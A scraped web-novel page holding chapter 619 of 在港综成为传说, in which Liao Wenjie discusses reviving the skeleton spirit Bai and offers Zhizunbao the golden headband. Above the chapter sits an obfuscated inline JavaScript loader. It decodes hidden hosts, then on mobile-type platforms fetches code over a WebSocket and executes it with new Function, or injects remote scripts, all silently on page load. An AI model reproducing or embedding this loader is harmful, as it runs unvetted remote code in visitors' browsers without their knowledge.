笔趣阁

字:
关灯 护眼
笔趣阁 > 在港综成为传说 > 第六百一十九章 我不做人了
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第六百一十九章 我不做人了

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“我重申一遍,我不是菩萨,带你们几个猴子到处乱窜,是菩萨受不了唐三藏的啰嗦,甩锅给了我,那时我欠她一个人情……”
  
  廖文杰两手一摊:“说白了,都是巧合。”
  
  你才是猴子!
  
  至尊宝表面点头,心里不以为然,严肃脸道:“军师,你说的都对,那我重问一遍,军师你神通广大,牛魔王说压就压,复活个死人手来擒来,比吃饭喝水还容易,对吧?”
  
  “……”
  
  “军师,你说话呀。”
  
  “都让你说完了,我还说个屁。”
  
  廖文杰翻翻白眼:“白姑娘如果还剩一口气,我倒是可以拉她一把,问题是你也说了,她人都成了骷髅架子,我纵有神仙手段也无可奈……”
  
  “她本来就是一个骨架。”至尊宝小声提醒。
  
  “那更难,一个死掉的骨架,如何能活?”
  
  “军师,人死真就不能复生吗?”
  
  至尊宝苦涩出声,应了那句话,希望有多大失望就有多大,偶遇廖文杰,他心怀期待,结果又是一次大起大落。
  
  廖文杰沉吟片刻,道:“实话告诉你,人死不能复生这句话并不绝对,要看什么人来办,兜率宫的太上老君,他手里有一种名叫‘九转还魂丹’的仙丹,顾名思义,专治身死离魂之症。”
  
  “死也是病?”
  
  至尊宝瞪大眼睛,很是不可思议。
  
  “他牛,他大,他厉害,所以他说了算,你还有什么问题吗?”
  
  “无了。”
  
  “再有就是昆仑山的灵芝草,亦可以起死回生,是南极仙翁种下的灵草。”
  
  “这个神仙我知道,老寿星,对吧?”
  
  “也不尽然。”
  
  廖文杰解释道:“民间神话和正统的道教职场还是有些出入的,我更愿意称他为‘南极长生大帝’,六御之一。据说是元始天尊之元神分身,统御万灵,普化众生,又号‘玉清真王’,雷部众神之力皆出于他,为众神法源,是天花板级别的神仙。”
  
  “我懂了,人死不能复生只对普通神仙有效,对大佬而言无所谓,因为规矩是他们制定的。”
  
  “没错,领悟很深刻,看来你真懂了。”
  
  廖文杰点点头:“情况就是这样,你的白姑娘虽然死了,但并没有完全死,还能抢救一下。”
  
  “大夫,那该怎么抢救呢?”
  
  至尊宝一眨不眨盯着廖文杰,不要脸道:“大夫你神通广大,肯定和这些大人物关系匪浅,要不这样好了,你约他们出来喝个下午茶,他们喝了你的茶,没准就会留下还魂丹和灵芝草。”
  
  “和我有什么关系,那是你的白姑娘,又不是我的。”
  
  廖文杰撇撇嘴,猛然间眉头一皱,想到了唐三藏留下的金箍。
  
  爱情和自由,又是一道选择题摆在了至尊宝面前,选择自由,至尊宝会失去爱情,而选择爱情,至尊宝将同时失去自由和爱情。
  
  好残忍的选项,与其说是放下执念,倒不如说是忘记了自我。
  
  “军师,你怎么不说话了,是不是在考虑下午茶的时间?”
  
  “你想多了,我和那些大人物不熟,就算认识,我也不会为了你去找他们,对我这种修行中人而言,欠人情是一件很头疼的事,处理不好没准还会把命丢了。”
  
  廖文杰摇摇头:“不过你也不用慌,我可以给你指一条明路,去找那只猴子,虽说此猴非彼猴,可再怎么说他也继承了前任留下的遗产,其中就有天庭册封的闲职‘齐天大圣’,找老君讨要一枚九转还魂丹不是难事。”
  
  “找猴子……”
  
  至尊宝挤挤眼,想到了来时孙悟空那张不怀好意的嘴角,不知怎么的,裆下一凉,强烈的直觉告诉他,去找猴子肯定没好果子吃。
  
  而且,就算他含泪吞下了苦果,猴子收了钱也不会办事,十成十会搓一颗汗垢丸敷衍了事。
  
  “军师,就没别的办法了吗?”至尊宝苦着脸问道。
  
  “的确还有一个,不过这个方法我不建议你使用,因为……”
  
  廖文杰直勾勾盯着至尊宝:“用了之后,你会变成猴子。”
  
  “不会吧,这么恐怖?!”
  
  “嗯。”
  
  廖文杰想了想,最后还是拿出了金箍,语重道:“帮主,观音大士的画像想必你已经看过了,紫霞仙子也给你盖了章,你距离法力无边的猴子只差这个金箍。戴上它,你就是齐天大圣,届时不论上天还是入地,你总能找到一个复活白姑娘的办法。”
  
  “军师,你又想骗我变猴。”
  
  至尊宝眼角抽抽,一路走来,但凡是他见过的猴子,包括他在内,有一个算一个,统统在挨虐,这算哪门子的法力无边。
  
  “大错特错,别人怎么想,我管不着,我一直支持你做人,拿出这个金箍只是不想干预你的人生,毕竟这是你的选择,我没法插手。”廖文杰郑重道。
  
  至尊宝停下脚步,一言不发接过金箍,许久后道:“军师,戴上这个金箍,我还是我吗?”
  
  “不知道。”
  
  “那我还记得晶晶和紫霞吗?”
  
  “记得。”
  
  廖文杰先是点头,而后摇头:“不过丑话说在前面,戴上这个金箍之后,你就不再是一个凡人,人世间的情欲不能再沾半点,如果动心,这个金箍会越收越紧,把你的脑袋勒成一个葫芦。”
  
  “只是葫芦?”
  
  “当然不是,戴上之后,你虽然可以救活白姑娘,但从此四大皆空,美色于你如浮云,左师父右徒儿的美梦一次都做不到。”廖文杰如实恐吓道。
  
  “做梦都不给,真不把猴子当人了……”至尊宝苦笑连连,握着金箍的手松了又紧,紧了又松,挣扎了许久都没有放下。
  
  “是吧,这金箍有问题,居然不让近女色。”
  
  廖文杰吐槽道:“你一个猴,不让近女色就没法繁衍生息,没法繁衍生息就不能壮大种群,灵明石猴可是珍稀动物,不帮着造猴就算了,居然还让你戒色,这金箍一点也不动物保护。”
  
  “说的也是……”
  
  至尊宝有气无力应声,片刻后,他眉头一挑,疑惑道:“军师,你也是神仙,你也不是凡人,为什么你能近女色?”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师